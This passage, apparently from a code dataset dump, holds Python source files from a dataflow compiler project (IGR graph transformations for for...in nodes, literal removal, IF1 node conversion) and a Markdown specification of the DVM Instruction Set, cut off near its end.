self.storage[key]\n\t\t\tlst.append(token)\n\t\telse:\n\t\t\tself.storage.update({key : [token]})\n\n\t##\n\t# Send all the stored tokens\n\t# that were waiting for a switch to be set.\n\t#\n\t# \\param key\n\t#\t\tThe key of the switch that was set.\n\t#\t\tAnd the context for which this was set.\n\t# \\param dst\n\t#\t\tThe destination for the tokens.\n\t##\n\tdef sendStored(self, key, dst):\n \t\tif key in self.storage:\n \t\t\tlst = self.storage[key]\n \t\t\tdel self.storage[key]\n\n \t\t\tfor token in lst:\n \t\t\t\ttoken.tag.inst = dst\n \t\t\t\tself.tokenizer.add(token)\n\t##\n \t# Set the destination of tokens for\n \t# a given (switch instruction, context) pair.\n \t# This will also release all the tokens that are\n \t# stored for this context.\n \t#\n \t# \\param inst\n \t#\t\tThe instruction that sent the switch.\n \t# \\param cont\n \t#\t\tThe context that received the setSwitch\n \t# \\param dst\n \t#\t\tThe destination of the tokens of the switch.\n \t##\t\n \tdef set(self, inst, cont, dst):\n \t\tkey = (inst.key, cont)\n \t\tself.destinations.update({key : dst})\n \t\tself.sendStored(key, dst)\n\n \t##\n \t# Send a token to the destination of a SwitchInstruction.\n \t# Store the token if the destination is currently unknown.\n \t# Only the instruction address of the token tag is modified.\n \t#\n \t# \\param token\n \t#\t\tThe token to switch\n \t# \\param inst\n \t#\t\tThe instruction that sent the token.\n \t##\n \tdef switch(self, token, inst):\n \t\tkey = (inst.key, token.tag.cont)\n\n \t\tif key in self.destinations:\n \t\t\tself.send(key, token)\n \t\telse:\n \t\t\tself.store(key, token)" }, { "alpha_fraction": 0.6996297240257263, "alphanum_fraction": 0.7078062295913696, "avg_line_length": 24.030887603759766, "blob_id": "d702ced31871c3c31099783c914edc1eefdfae38", "content_id": "3414858f2dce2340f8ca8b222c0d60412de34a44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6482, "license_type": "no_license", "max_line_length": 79, "num_lines": 259, "path": "/DISc/backEnd/DVM/forin.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# forin.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.forin\n# \\brief IGR for in structure changer\n#\n# This module contains functions to modify the IGR graph\n# in order to be able to compile the for...in compound node.\n##\n\nimport IGR\nimport IGR.node\n\n##\n# Stores the destination of the \n# context change for every split.\n##\nmap = {}\n\n##\n# See how many arrays a for...in node \n# generates internally.\n##\ndef getArrayCount(node):\n\tctr = 0\n\tfor port in node.subGraphs[1].exit.inputPorts:\n\t\tif port.isConnected():\n\t\t\tctr += 1\n\treturn ctr\n\n##\n# See if the generator accepts\n# an array or creates on.\n##\ndef acceptsArray(node):\n\tgen = node.subGraphs[0]\n\tif gen.entry in gen.nodes:\n\t\treturn len(node.subGraphs[0].nodes) == 2\n\telse:\n\t\treturn len(node.subGraphs[0].nodes) == 1\n\n# --------------- #\n# Return Subgraph #\n# --------------- #\n\n##\n# Replace the subgraphHeader of the return subgraph with\n# array instructions that will merge our inputs.\n# We also update the map with the idx -> instruction mapping.\n##\ndef addMerges(node):\n\tstart = node.subGraphs[0].exit.inputs\n\tentry = node.subGraphs[2].entry\n\n\t# Add merge outputs to the exit points of the body\n\tfor port in entry.outputPorts[start:]:\n\t\tmerge = IGR.createOperationNode(node.subGraphs[2], 'array')\n\n\t\tmerge.getOutputPort(0).targets = port.targets\n\t\tport.targets = []\n\n\t\tfor target in merge.getOutputPort(0).targets:\n\t\t\ttarget.source = merge.outputPorts[0]\n\n\t\tmap.update({port.idx : [None, merge]})\n\n\t# Shift the indices so that the array\n\t# is at element 0 with everything else behind it.\n\tarrIdx = node.inputs\n\tarrPort = entry.getOutputPort(arrIdx)\n\n\tentry.outputPorts[1:arrIdx + 1] = entry.outputPorts[:arrIdx]\n\tentry.outputPorts[0] = arrPort\n\n\tfor idx in xrange(0, arrIdx + 1):\n\t\tentry.outputPorts[idx].idx = idx\n\n\t# Attach any external input.\n\tfor port in entry.outputPorts[:arrIdx]:\n\t\tif port.isConnected():\n\t\t\tgenPort = node.subGraphs[0].getOutputPort(port.idx)\n\t\t\tgenPort.addTargets(port.targets)\n\t\t\tfor target in port.targets:\n\t\t\t\ttarget.source = genPort\n\n\tnode.subGraphs[2].removeNode(node.subGraphs[2].entry)\n\n# --------- #\n# Generator #\n# --------- #\n\ndef adjustGenerator(node):\n\tgen = node.subGraphs[0]\n\n\t# Remove the elements provided by scatter/range\n\tarrPort = gen.exit.getInputPort(node.inputs)\n\tdst = gen.exit.getInputPort(0)\n\tsrc = arrPort.source\n\tsrc.removeTarget(arrPort)\n\tarrPort.source = None\n\t\n\t# If we are dealing with a generated array\n\t# (instead of an external one), link the array\n\t# generator.\n\tsrc.addTarget(dst)\n\tdst.source = src\n\n\t# Get the arguments to the node linked to the\n\t# exit node (which will lead to the split)\n\tfor port in node.inputPorts:\n\t\tsrc = port.source\n\t\tidx = port.idx + 1\n\n\t\tdst = gen.exit.getInputPort(idx)\n\t\tsrc.removeTarget(port)\n\t\tsrc.addTarget(dst)\n\t\tdst.attach(src)\n\n\t\tentryPort = gen.entry.getOutputPort(port.idx)\n\t\ttargets = entryPort.targets\n\t\tentryPort.targets = []\n\n\t\tfor target in targets: target.source = src\n\t\tsrc.addTargets(targets)\t\n\n\tgen.removeNode(gen.entry)\n\n\n# ---- #\n# Body #\n# ---- #\n\n##\n# Adjust the ports of the body so that the array\n# elements are at port 0 and the other arguments after it.\n##\ndef shiftBodyPorts(node):\n\tentry = node.subGraphs[1].entry\n\tarrIdx = node.inputs\n\n\tarrPort = entry.getOutputPort(arrIdx)\n\tentry.outputPorts[1:arrIdx + 1] = entry.outputPorts[:arrIdx]\n\tentry.outputPorts[0] = arrPort\n\n\tfor idx in xrange(0, arrIdx + 1):\n\t\tentry.outputPorts[idx].idx = idx\n\n##\n# Follow the path through the body,\n# starting from the exit point and \n# add every node we encounter up to the entry.\n##\ndef duplicatePath(node, idx):\n\tsg = IGR.createCompoundSubGraph()\n\tsg.name = \"body_%d\" % idx\n\tnode.subGraphs.append(sg)\n\n\tentryNode = node.subGraphs[1].entry\n\tbodyPort = node.subGraphs[1].getInputPort(idx)\n\tcopyPort = sg.getInputPort(idx)\n\tbodyNode = bodyPort.source.node\n\tlst = [(bodyNode, bodyPort, copyPort)]\n\n\twhile lst:\n\t\tbodyNode, bodyPort, copyPort = lst.pop()\n\n\t\tif bodyNode is entryNode: \n\t\t\tIGR.connect(sg.entry, bodyPort.source.idx, copyPort.node, bodyPort.idx)\n\t\t\tcontinue\n\n\t\tcopyNode = bodyNode.copy(sg)\n\t\tsg.addNode(copyNode)\n\n\t\tIGR.connect(copyNode, bodyPort.source.idx, copyPort.node, bodyPort.idx)\n\n\t\tfor port in bodyNode.inputPorts:\n\t\t\tif port.acceptsLiteral():\n\t\t\t\tcopyNode.getInputPort(port.idx).attach(port.source)\n\t\t\telse:\n\t\t\t\tlst.append((port.source.node, port, copyNode.getInputPort(port.idx)))\n\n##\n# Duplicate the path for every out port that produces\n# an array.\n##\ndef splitBody(node):\n\tif getArrayCount(node) == 1:\n\t\tidx = node.inputs + 1\n\t\tnode.subGraphs[1].name = \"body_%d\" % idx\n\t\tnode.subGraphs.append(node.subGraphs[1])\n\telse:\n\t\tfor port in node.subGraphs[1].exit.inputPorts:\n\t\t\tif port.isConnected():\n\t\t\t\tduplicatePath(node, port.idx)\n\ndef addBodySinks(node):\n\tfor sg in node.subGraphs[3:]:\n\t\tidx = int(sg.name[5:])\n\t\tarr = map[idx]\n\t\tarr[0] = sg.entry\n\n# ------- #\n# General #\n# ------- #\n\ndef convertForIn(node):\n\tglobal map\n\tmap = {}\n\n\tnode.subGraphs[0].name = \"Generate\"\n\tnode.subGraphs[2].name = \"Return\"\n\n\taddMerges(node)\n\tadjustGenerator(node)\t\n\n\tshiftBodyPorts(node)\n\tsplitBody(node)\n\taddBodySinks(node)\n\n\tnode.map = map\n\ndef checkNode(node):\n\tif (isinstance(node, IGR.node.CompoundNode) and \n\t\tnode.type == 'forall'):\n\t\tconvertForIn(node)\n\ndef convert():\n\tIGR.traverse(\n\t\tcheckNode, \n\t\tlambda x : None,\n\t\tlambda x : None,\n\t\tFalse,\n\t\tlambda x : None,\n\t\tlambda x : None\n\t\t)" }, { "alpha_fraction": 0.7327340245246887, "alphanum_fraction": 0.7351458072662354, "avg_line_length": 26.817073822021484, "blob_id": "c4e94b436de7aece3a0537d4f600de7c0acf874e", "content_id": "5f225529f0e6a3dd57ba0f14d5073e14a48349a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4561, "license_type": "no_license", "max_line_length": 79, "num_lines": 164, "path": "/DISc/backEnd/DVM/literals.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# literals.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.literals\n# \\brief IGR Literal removal\n# \n# This module defines a few traversals\n# that remove literals from the IGR where\n# possible.\n##\n\nimport dvm\nimport dis\nimport IGR.node\nimport nodeConverter\nimport graphConverter\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## See if a node only contains literals\ndef isLit(node):\n\tif not node.inputPorts: return False\n\tfor port in node.inputPorts:\n\t\tif not port.acceptsLiteral():\n\t\t\treturn False\n\treturn True\n\n## Get all the literal inputs of a node.\ndef getInputs(node):\n\tres = []\n\tfor port in node.inputPorts:\n\t\tres.append(port.source.value)\n\treturn res\n\n##\n# Create a DIS program to execute a \n# single operation.\n##\ndef createOpStr(node):\n\tprog = dis.DIS(node.inputs)\n\tkey = nodeConverter.convertNode(prog, node)\n\tprog.linkStart(key)\n\tprog.linkStop(key)\n\treturn prog.generate()\n\n##\n# Create a DIS program to execute a\n# single function call.\n##\ndef createCallStr(node):\n\treturn graphConverter.convert(entryName = node.function)\n\n##\n# Add the result of executing\n# a node to all it's outputs.\n##\ndef transformNode(node, value):\n\tfor port in node.outputPorts:\n\t\tfor port in port.targets:\n\t\t\tIGR.addLiteral(value, port.node, port.idx)\t\n\n##\n# Calculate the value of a literal\n# and propagate it to the next nodes.\n##\ndef propagateLit(node):\n\tstr = None\n\tif isinstance(node, IGR.node.OperationNode):\n\t\tstr = createOpStr(node)\n\telif isinstance(node, IGR.node.CallNode):\n\t\tstr = createCallStr(node)\n\telif isinstance(node, IGR.node.SubGraphExitNode):\n\t\tval = getInputs(node)[0]\n\t\tnode.subGraph.reduce(val)\n\t\tnode.subGraph.removeNode(node)\n\t\tlog.info(\"Reduced trivial graph: %s\", node.subGraph)\n\t\treturn\n\telse:\n\t\tlog.error(\"Literals added to unsupported node: %s\", node)\n\t\treturn\t\n\n\tval = dvm.run(dis = str, inputs = getInputs(node))\t\n\tnode.subGraph.removeNode(node)\n\ttransformNode(node, val)\n\tlog.info(\"Reducing node '%s' to literal '%s'\", node, val)\n\n##\n# See if a call can be reduced to a \n# constant. If possible, propagate.\n##\ndef checkCall(node):\n\tgraph = IGR.getSubGraph(node.function)\n\tif graph.isTrivial():\n\t\ttransformNode(node, graph.value)\n\t\tnode.subGraph.removeNode(node)\n\t\tlog.info(\"Replacing call '%s' with constant '%s'\", node, graph.value)\n\n## See if a node can be removed, do so if possible.\ndef checkNode(node):\n\tif isLit(node):\n\t\tpropagateLit(node)\n\telif isinstance(node, IGR.node.CallNode):\n\t\tcheckCall(node)\t\n\n## See if we can remove a graph from the program.\ndef checkFunctionGraph(subGraph):\n\tif subGraph.isTrivial() and subGraph.isFunc:\n\t\tIGR.removeSubGraph(subGraph)\n\t\tlog.info(\"Removing trivial function graph %s\", subGraph)\n\n## See if we need to convert a subgraph to a constant\ndef checkCompoundGraphs(node):\n\tfor subGraph in node.subGraphs:\n\t\tif subGraph.isTrivial():\n\t\t\t# Remove the subgraph by a constant, followed by the exit node.\n\t\t\tconst = IGR.createConstantNode(subGraph, subGraph.value)\n\t\t\tsubGraph.entry = const\n\t\t\tsubGraph.nodes = [subGraph.exit, const]\n\t\t\tIGR.connect(const, 0, subGraph.exit, 0)\n\t\t\tlog.info(\"Replacing trivial graph %s by constant: %s\", subGraph, const)\n\n## Remove all operations that have predefined inputs.\ndef removeLiterals():\n\tIGR.traverse(\n\t\tcheckNode,\n\t\tlambda x: None,\n\t\tlambda x: checkNode(x.exit),\n\t\tFalse,\n\t\tlambda x: None,\n\t\tcheckCompoundGraphs\t\t\n\t)\n\tIGR.traverse(\n\t\tlambda x : None,\n\t\tcheckFunctionGraph,\n\t\tlambda x : None,\n\t\tFalse,\n\t\tlambda x : None,\n\t\tlambda x : None\n\t)" }, { "alpha_fraction": 0.7302007079124451, "alphanum_fraction": 0.7365800738334656, "avg_line_length": 25.561983108520508, "blob_id": "6389540240e8183dea2e4cc37bb0f9807bda909c", "content_id": "325380782e460ab936f716321fdede477904104e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6427, "license_type": "no_license", "max_line_length": 79, "num_lines": 242, "path": "/DISc/frontEnd/IF1/converter.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# convert.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.convert\n# \\brief Node converter\n# \n# This module converts some of the IF1 operations\n# into different node types.\n# Other operations are adjusted to remove semantic\n# differences between IF1 and dis\n##\n\nimport IGR\nimport IGR.node\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# See if a port utilizes a correct lower bound\n# of an array.\n##\ndef checkLowerBound(port, valid):\n\tif (not port.acceptsLiteral() or port.source.value != valid): \n\t\tlog.info(\"Converting invalid lower bound: %s\", port)\n\t\tport.source.valid = 0\n\n##\n# Remove the first input port of a node.\n# Update the indices of the other ports\n# to reflect this.\n##\ndef removeInputPort(node):\n\tnode.inputs -= 1\n\tnode.inputPorts = node.inputPorts[1:]\n\tfor port in node.inputPorts:\n\t\tport.idx -= 1\n\n##\n# Convert ABuild.\n#\n# This operation remains relatively unchanged,\n# we just remove the lower bound of the build operation.d\n# We also emit a warning if the lower bound is not 0.\n##\ndef convertABuild(node):\n\tnode.operation = 'array'\n\tcheckLowerBound(node.inputPorts[0], 0)\n\tremoveInputPort(node)\n\n\tif node.inputs == 0:\n\t\tnode.subGraph.removeNode(node)\n\t\tfor port in node.outputPorts:\n\t\t\tfor port in port.targets:\n\t\t\t\tIGR.addLiteral([], port.node, port.idx)\n\n##\n# Convert AFill.\n# \\see convertABuild\n##\ndef convertAFill(node):\n\tnode.operation = 'arrCreate'\n\tcheckLowerBound(node.inputPorts[0], 0)\n\tremoveInputPort(node)\n\n##\n# Convert AGather.\n# Gathers only occur in the returns subgraph of \n# compound nodes. This has different semantics in DVM.\n#\n# The actual instruction that constructs the array is added \n# during the compilation of the compound node. Thus, we can remove\n# the gather operation if it only does this. If it also filters out a \n# part of the array, a prune instruction is added to do the actual filtering.\n##\ndef convertAGather(node):\n\tcheckLowerBound(node.inputPorts[0], 0)\n\tremoveInputPort(node)\n\n\tif node.inputs > 1:\n\t\tnode.operation = 'arrPrune'\n\telse:\n\t\tinputPort = node.inputPorts[0]\n\t\ttargets = [target for port in node.outputPorts for target in port.targets]\n\n\t\tinputPort.source.removeTarget(inputPort)\n\t\tinputPort.source.addTargets(targets)\n\t\tnode.subGraph.removeNode(node)\t\n\n##\n# Convert AScatter.\n#\n# There is no concept of a scatter opertaion in DVM.\n# Instead a Split operation provides this functionality.\n# The split is added when compiling the compound node.\n##\ndef convertAScatter(node):\n\tinputPort = node.inputPorts[0]\n\ttargets = [target for target in node.outputPorts[0].targets]\n\n\tinputPort.source.removeTarget(inputPort)\n\tinputPort.source.addTargets(targets)\n\tnode.subGraph.removeNode(node)\n\n\tfor target in targets:\n\t\ttarget.source = inputPort.source\n\n\tfor target in node.outputPorts[1].targets:\n\t\ttarget.source = None\n\t\n##\n# Convert ALimL\n#\n# A DVM array always has a lower bound of 0.\n# So we eliminate this node and add 0 as a literal.\n##\ndef convertALimL(node):\n\tfor port in node.outputPorts:\n\t\tfor port in port.targets:\n\t\t\tIGR.addLiteral(0, port.node, port.idx)\n\tfor port in node.inputPorts:\n\t\tport.source.removeTarget(port)\n\tnode.subGraph.removeNode(node)\t\n\n##\n# A lower bound of an array cannot be changed\n# in DVM. Thus we remove this operation.\n# We also return an error if the bound was \n# set to anything that is not 0\n##\ndef convertASetL(node):\n\tarrPort = node.inputPorts[0]\n\tbndPort = node.inputPorts[1]\n\tcheckLowerBound(bndPort, 0)\n\n\ttargets = [target for port in node.outputPorts for target in port.targets]\n\n\tif not bndPort.acceptsLiteral():\n\t\tbndPort.source.removeTarget(bndPort)\n\n\tarrPort.source.removeTarget(arrPort)\n\tarrPort.source.addTargets(targets)\n\tnode.subGraph.removeNode(node)\t\n\n## Convert a call operation to a call node.\ndef convertCall(node):\n\tsubGraph = node.subGraph\n\tfunction = node.inputPorts[0].source.value\n\tcallNode = IGR.node.CallNode(subGraph, function)\n\tsubGraph.replaceNode(node, callNode)\n\tremoveInputPort(callNode)\n\n##\n# Convert 'less chains'\n#\n# IF1 does not define a more or moreEq, \n# instead it adds a not after a < or =<\n# This method looks for such a chain and replaces\n# it if possible.\n##\ndef convertLessChain(node, replacement):\n\ttargets = node.outputPorts[0].targets\n\tnotNode = node.outputPorts[0].targets[0].node\n\n\tif not (\n\t\tlen(targets) == 1 and \n\t\tisinstance(notNode, IGR.node.OperationNode) and \n\t\tnotNode.operation == 'not'\n\t\t): return\n\n\tnode.operation = replacement\n\tnode.subGraph.removeNode(notNode)\n\tnode.outputPorts = notNode.outputPorts\n\tfor port in node.outputPorts:\n\t\tport.node = node\n\n## \n# Convert a less chain: \n# not smaller => greater or eq\n##\ndef convertLess(node):\n\tconvertLessChain(node, 'moreEq')\n\n## \n# Convert a less chain: \n# not smaller or eq => greater\n##\ndef convertLessEq(node):\n\tconvertLessChain(node, 'more')\n\nconversions = {\n\t'ABuild' : convertABuild,\n\t'AFill' : convertAFill,\n\t'AGather' : convertAGather,\n\t'AScatter' : convertAScatter,\n\t'ALimL' : convertALimL,\n\t'ASetL' : convertASetL,\n\t'Call' : convertCall,\n\t'less' : convertLess,\n\t'lessEq' : convertLessEq\n}\n\ndef checkNode(node):\n\tif (\n\t\tisinstance(node, IGR.node.OperationNode) \n\t\tand node.operation in conversions\n\t\t):\n\t\tconversions[node.operation](node)\n\ndef run():\n\tIGR.traverse(\n\t\tcheckNode, \n\t\tlambda x : None,\n\t\tlambda x : None,\n\t\tFalse,\n\t\tlambda x : None,\n\t\tlambda x : None\n\t\t)" }, { "alpha_fraction": 0.7319725751876831, "alphanum_fraction": 0.7375773787498474, "avg_line_length": 42.47272872924805, "blob_id": "e8307be8e82115b5b98cc699b6e180572ec89389", "content_id": "5643f9c6208b2b501875cb99e8264120f3c75fc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11954, "license_type": "no_license", "max_line_length": 372, "num_lines": 275, "path": "/doc/DIS.md", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "<!-- Written by Mathijs Saey at the VUB, all rights reserved -->\n\n# General {#General}\n\n[TOC]\n\n__This guide is deprecated! People looking for a complete DIS reference can always [contact me](https://github.com/mathsaey).__\n\nThis page defines the standard of DIS, the DVM Instruction Set. DIS is the only input accepted by DVM, and can be generated by an external tool. As the name might say, DIS simply contains the instruction set that DVM uses to execute programs. Simply said, DIS is a string representation of the DVM instruction memory.\n\n## The Instruction Memory. {#Memory}\n\nSeeing that DIS is a string version of the instruction memory, it might be handy to know what the instruction memory looks like. \n\nThe DVM instruction memory is divided into **chunks**, each of these chunks contains instructions that have certain properties. At the time of writing, the instruction memory contains 2 chunks, instructions that need to be matched by the context matcher and instructions that don't need to be matched.\n\nThe instructions that don't need to be matched are located in chunk 0, while those that need to be matched are located in chunk 1.\n\n# DIS file layout {#Layout}\n\nA DIS file contains 4 types of statements, seperated by newlines.\n\t* [Chunk declarations](#Chunks)\n\t* [Instruction definitions](#Instructions)\n\t* [Links between instructions](#Links)\n * [Literals of instructions](#Literals)\n\nBesides these, DIS can contain comments, a comment is started by using `$`\n\nThe following sections detail the exact nature of the other statements.\n\n## Chunks {#Chunks}\n\nLike the instruction memory, a DIS file is divided in chunks. A chunk simply contains all the instructions present in this chunk. A new chunk is started with the following statement:\n\n CHUNK <idx>\n\nWhere chunk is a keyword while idx is the index of the chunk. A chunk ends when a new chunk begins or when the file ends. It is not possible to nest chunks.\n\n## Links {#Links}\n\nA link allows us to define from-to relationships between instructions. A link is added in the following way:\n\n LINK <from> -> <to>\n\nWhere LINK is a keyword while from is the address (chunk, instruction, port) of the port on the source node while to is the address of the port on the to node.\n\nA port address is represented with the following syntax:\n\n <chunk> <instruction> <port>\n\n\nThus a link from port 0 of instruction 3 in chunk 0 to port 0 of instruction 1 in chunk 1 would look like this:\n\n LINK 0 3 0 -> 0 1 0\n\nLinks can occur anywhere in the file, and transcend chunk boundaries. However, a link should never precede the declaration of it's source.\n\n## Instructions {#Instructions}\n\nAn instruction in DIS looks like this:\n\n INST <type> <idx> <args>\n\nWhere idx is the index of the instruction in the chunk of memory, while type is the type of instruction we are creating. Args represents the arguments. These depend on the type of instruction.\n\n\n### Instructions Types\n\nThe following table defines the possible instruction types, their type code and the argument string they accept. Additional explanation on each of these types can be found below.\n\nType | Code | Args \n-----| -----|------\n[Sink](\\ref core::instruction::Sink) | SNK | `None`\n[Switch](\\ref core::instruction::Switch) | SWI | `<dstList>`\n[Constant](\\ref core::instruction::Constant) | CNS | `None`\n[ContextChange](\\ref core::instruction::ContextChange) | CHN | `<to> <return sink>`\n[ContextRestore](\\ref core::instruction::ContextRestore) | RST | `None`\n[OperationInstruction](\\ref core::instruction::OperationInstruction) | OPR | `<opCode> <inputs>`\n\n#### Sinks\n\nSinks are the the simplest instruction that is available. A sink is a simple link between a from and to. It will send whatever input it receives on a port to the destination for that port.\n\nSinks are mainly used to have a static point in the program that can catch input (such as the start of a function). A sink takes no arguments, since it's behavior is defined by it's destinations, which are added through links.\n\n#### Switch\n\nA Switch allows us to change the destination of a token depending on a condition. A switch stores all the tokens that it receives, until it's destination is determined. Once the destination is determined, all the stored tokens are sent to this destination. Further tokens that are received will also be sent to the same destination.\n\nThe destination is determined by a token that arrives at port 0. This token carries an index, which corresponds to a destination in the *destination list* of the switch.\n\nA Switch only modifies the destination address of the tokens it receives, it does not touch the port. Sinks should be used when rederection is required.\n\nA Sink is declared in the following manner:\n\n INST SW <idx> <destination list>\n\nA destination list looks like this:\n\n <chunk 0> <address 0> <chunk 1> <address 1> ... <chunk n> <address n>\n\nSimply put, a destination list is a list of chunk, address pairs, their order determines the index that they are assigned to. \n\nFor instance, in the following example:\n\n INST SW 0 0 22 1 5\n\nIndex 0 would correspond to sending further tokens to instruction (0, 22), while index 1 would correspond to sending the tokens to instruction (1, 5).\n\n#### ContextChange\n\nA Context change instruction changes the context of a token. Look into the [documentation](\\ref core::instruction::ContextChange) for further information.\n\nA context change instruction takes 4 arguments:\n * Amount of binds, the amount of tokens that will \"enter\" the contextchange.\n * Amount of restores, the amount of tokens that will be returned to the return sink.\n * Address of a sink, which will be the destination of any token that enters the instruction. \n * Address of a return sink, which will catch anything that is returned when the context is restored. \n\nThus a context change will look like this:\n\n INST CC <idx> <binds> <restores> <address> <address>\n\nSuch an address is similar to a link address:\n\n <chunk> <instruction>\n\nThus a context change instruction is added in the following manner:\n\n INST CC 2 2 1 0 4 0 3\n\n#### Context Restore\n\nA context Restore finds the return instruction of a token based on it's context and sends it to that location. It can be compared to a return from a call. Once again, we refer to the [documentation](\\ref core::instruction::ContextRestore) for additional information.\n\nA context restore takes no arguments.\n\n#### Operation Instruction\n\nAn operation instruction represents an operation on the data of a set of tokens. It takes an opcode, which represents the operation it performs, and a number detailing the amount of inputs it should receive. It ends up looking like this:\n\n INST OP <idx> <opCode> <inputs>\n\nExample:\n\n INST OP 0 1 2\n\nThe opCodes can be found in the [appendix](#Operations)\n\n#### Constant Instruction\n\nA constant instruction is an instruction that will always return the same result, regardless of the input. This operation should only be used if a literal cannot be eliminated from the program. A constant instruction should also only receive a single token from the same context, or it will resend it's result.\n\nA constant takes it's value as an argument and is declared in the following way:\n\n INST CO <idx> <= <value>\n\nFor possible values of this value, check the [literals](#Literals) section. Constant instructions should only be used when it is not possible to add this value as a literal to the program in another way.\n\n#### Entry and Exit point\n\nIn order to communicate with the outside world, the DVM needs to have a predefined entry and exit point to the program. These are added by using a special instruction that can only be used for this purpose. These special instructions have to be placed at predefined locations.\n\nThe entry point of the program should be located in chunk 0 at address 0, while the exit point should be located at chunk 0 at address 0. These points are added through the program begin and program end points. The program entry point should also defined the amount of inputs the program accepts.\n\nentry point: \n\n INST PB 0 <inputs>\n\nexit point:\n\n INST PE 0\n \n## Literals {#Literals}\n\nSome instructions can take some arguments that are known in advance. Examples are additions where one of the elements is already known or function calls with a few predefined arguments. It's important to know that every instruction needs at least one unknown attribute, an attribute which is not a literal. Any instruction that only accepts literals should be precomputed.\n\nA literal is defined with the following statement:\n\n LITR <instruction> <port> <= <value>\n\nWhere instruction is the index of an instruction, which is located in the current chunk. Port is the idx of the port where the literal will end up and value is the value of the literal. Thus adding a literal to an instruction at address 0 at port 1 is done in the following way.\n\n LITR 0 1 <= \"A literal string\"\n\nLiterals can only be added to operation and context change instructions. The following table defines the various types that can be defined as literals.\n\nType | Example \n--------|---------\nBool | True\nNumber | 1298\nString | \"Hello World\"\nArray | [21, \"test\"]\n\n## Trivial Programs {#Trivial}\n\nSome programs do not need any external input to complete, in this case, the dataflow semantics do not allow DVM to actually execute anything. This is why the triv statement is introduced. If a program can be completely predetermined, it's value can be defined by using the triv statement. \n\nThe triv statement is similar to a literal without a real destination, instead, upon program start, the runtime will see if we have encountered any trivial statements. If we did, we simply return the value and stop execution. Only one triv statement should be present in a dis file.\n\nA trivial program is defined with the following statement:\n\n TRIV <= <value>\n\nThus the program\n\n TRIV <= 42\n\nWill never really execute and just return 42 instead.\n\n# An Example {#Example}\n\nThe example below presents the DIS code for a program that contains most of the available DIS functionality while still remaining simple.\n\n~~~~\nfunction add(x, y, z):\n\treturn x + y + z + 5\nend function\n\nfunction Main(x, y):\n\treturn add(x, y, 4)\nend function\n~~~~\n\n\\include example.dis\n\n# 